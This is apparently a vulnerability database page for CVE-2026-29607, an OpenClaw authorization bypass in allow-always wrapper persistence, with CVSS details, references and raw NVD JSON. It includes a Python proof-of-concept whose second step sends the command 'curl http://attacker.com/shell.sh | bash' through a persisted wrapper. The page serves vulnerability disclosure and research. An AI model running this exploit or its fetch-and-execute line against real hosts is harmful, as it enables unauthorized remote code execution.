CVE-2026-29607

Description

OpenClaw versions prior to 2026.2.22 contain an authorization bypass vulnerability in allow-always wrapper persistence that allows attackers to bypass approval checks by persisting wrapper-level allowlist entries instead of validating inner executable intent. Remote attackers can approve benign wrapped system.run commands and subsequently execute different payloads without approval, enabling remote code execution on gateway and node-host execution flows.

CVSS Details

CVSS Score

6.8

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.2.22

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-29607 PoC - OpenClaw Authorization Bypass
# This PoC demonstrates the allow-always wrapper persistence vulnerability

import requests
import json
import time

TARGET_URL = "http://target-openclaw-server:8080"
VICTIM_HOST = "node-host-01"

def step1_register_benign_command():
    """Step 1: Register a benign system.run command in allowlist"""
    payload = {
        "action": "wrapper_persist",
        "wrapper_type": "allow-always",
        "command": "system.run",
        "args": ["echo", "diagnostic_test"],
        "target_host": VICTIM_HOST,
        "persist": True
    }
    response = requests.post(f"{TARGET_URL}/api/wrapper/register", json=payload)
    return response.json()

def step2_execute_malicious_payload():
    """Step 2: Execute different malicious payload via persisted wrapper"""
    # The allowlist entry persists, allowing different payload execution
    malicious_payload = {
        "action": "wrapper_execute",
        "wrapper_id": "allow-always-system-run-001",
        "command": "system.run",
        "args": ["bash", "-c", "curl http://attacker.com/shell.sh | bash"],
        "target_host": VICTIM_HOST
    }
    response = requests.post(f"{TARGET_URL}/api/wrapper/execute", json=malicious_payload)
    return response.json()

def exploit():
    print("[*] CVE-2026-29607 Exploitation")
    print("[*] Step 1: Registering benign command...")
    result1 = step1_register_benign_command()
    print(f"[+] Benign command registered: {result1}")
    
    print("[*] Step 2: Executing malicious payload via persisted wrapper...")
    result2 = step2_execute_malicious_payload()
    print(f"[+] Exploitation result: {result2}")
    
    return result2

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-29607
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-29607
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-29607/
[4] VulDB https://vuldb.com/cve/CVE-2026-29607
[5] https://github.com/openclaw/openclaw/commit/24c954d972400f508814532dea0e4dcb38418bb0
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-6j27-pc5c-m8w8
[7] https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-allow-always-wrapper-persistence

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-29607", "sourceIdentifier": "[email protected]", "published": "2026-03-19T02:16:03.010", "lastModified": "2026-03-25T15:16:42.653", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 contain an authorization bypass vulnerability in allow-always wrapper persistence that allows attackers to bypass approval checks by persisting wrapper-level allowlist entries instead of validating inner executable intent. Remote attackers can approve benign wrapped system.run commands and subsequently execute different payloads without approval, enabling remote code execution on gateway and node-host execution flows."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.2.22 contienen una vulnerabilidad de omisión de autorización en la persistencia del *wrapper* allow-always que permite a los atacantes omitir las comprobaciones de aprobación al persistir entradas de la lista de permitidos a nivel de *wrapper* en lugar de validar la intención del ejecutable interno. Los atacantes remotos pueden aprobar comandos *system.run* envueltos benignos y posteriormente ejecutar diferentes cargas útiles sin aprobación, lo que permite la ejecución remota de código en los flujos de ejecución de *gateway* y *node-host*."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/24c954d972400f508814532dea0e4dcb38418bb0", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-6j27-pc5c-m8w8", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-allow-always-wrapper-persistence", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}